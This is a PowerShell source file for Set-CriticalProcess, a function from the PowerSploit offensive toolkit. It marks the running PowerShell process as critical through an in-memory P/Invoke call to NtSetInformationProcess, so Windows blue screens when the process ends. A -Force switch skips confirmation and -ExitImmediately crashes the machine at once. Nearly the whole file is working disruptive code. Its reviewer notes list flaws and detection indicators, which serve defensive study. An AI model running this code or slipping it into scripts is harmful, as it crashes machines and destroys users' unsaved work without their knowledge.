function Set-CriticalProcess
{
<#
.SYNOPSIS

Causes your machine to blue screen upon exiting PowerShell.

PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Marks the current PowerShell process as a critical process by calling
ntdll!NtSetInformationProcess with information class 29
(ProcessBreakOnTermination). Once set, the machine blue screens when this
PowerShell process ends, whether by a normal exit or by Stop-Process.
The P/Invoke stub for NtSetInformationProcess is emitted at run time into an
in-memory dynamic assembly named 'BlueScreen' (AssemblyBuilderAccess::Run, never
written to disk).

.PARAMETER ExitImmediately

Immediately exit PowerShell after successfully marking the process as critical.

.PARAMETER Force

Set the running PowerShell process as critical without asking for confirmation.

.EXAMPLE

Set-CriticalProcess

.EXAMPLE

Set-CriticalProcess -ExitImmediately

.EXAMPLE

Set-CriticalProcess -Force -Verbose

.NOTES

Safety and detection notes (reviewer):
- The only privilege gate is a check that the caller is in the local
  Administrators role; the function throws otherwise.
- SupportsShouldProcess is declared but ShouldProcess is never called, so
  -WhatIf does NOT prevent the NtSetInformationProcess call. The only
  interactive guard is the ShouldContinue prompt, which -Force bypasses.
- The NTSTATUS returned by NtSetInformationProcess is discarded and any
  exception is swallowed by a bare catch that returns silently, so the
  Write-Verbose success message is printed regardless of the call's result.
- Where PowerShell script block logging is enabled, the dynamic assembly and
  type names ('BlueScreen', 'BlueScreen.Win32.ntdll') and the
  NtSetInformationProcess P/Invoke definition appear in the logged script
  text and are reasonable hunting indicators for this technique.
- The 4-byte unmanaged buffer allocated with AllocHGlobal is never freed.
#>

    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
        [Switch]
        $Force,

        [Switch]
        $ExitImmediately
    )

    # Refuse to run unless the current token is in the local Administrators role.
    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
    {
        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
    }

    # Without -Force, ask the operator to confirm via ShouldContinue. Note this is
    # not ShouldProcess, so -WhatIf has no effect on what follows.
    $Response = $True

    if (!$Force)
    {
        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
    }

    if (!$Response)
    {
        return
    }

    # Build an in-memory dynamic assembly/module to host the P/Invoke stub
    # (AssemblyBuilderAccess::Run: executed from memory, never persisted).
    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)

    # Define the [BlueScreen.Win32.ntdll]::NtSetInformationProcess P/Invoke method
    # with signature (IntPtr, UInt32, ref IntPtr, UInt32) -> Int32 (NTSTATUS).
    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
        'ntdll.dll',
        ([Reflection.MethodAttributes] 'Public, Static'),
        [Reflection.CallingConventions]::Standard,
        [Int32],
        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
        [Runtime.InteropServices.CallingConvention]::Winapi,
        [Runtime.InteropServices.CharSet]::Auto)

    $ntdll = $TypeBuilder.CreateType()

    # Handle to this PowerShell process, obtained through System.Diagnostics.Process.
    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
    # 4-byte unmanaged buffer passed to the call; it is never released with FreeHGlobal.
    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)

    # PROCESS_INFORMATION_CLASS value for ProcessBreakOnTermination.
    $ProcessBreakOnTermination = 29
    $SizeUInt32 = 4

    # The NTSTATUS result is discarded; an exception from the call returns silently,
    # so callers cannot distinguish success from failure here.
    try
    {
        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
    }
    catch
    {
        return
    }

    # Emitted whenever the call above did not throw, regardless of its NTSTATUS.
    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'

    # -ExitImmediately terminates this process, which is what triggers the bugcheck
    # once the process has been marked critical.
    if ($ExitImmediately)
    {
        Stop-Process -Id $PID
    }
}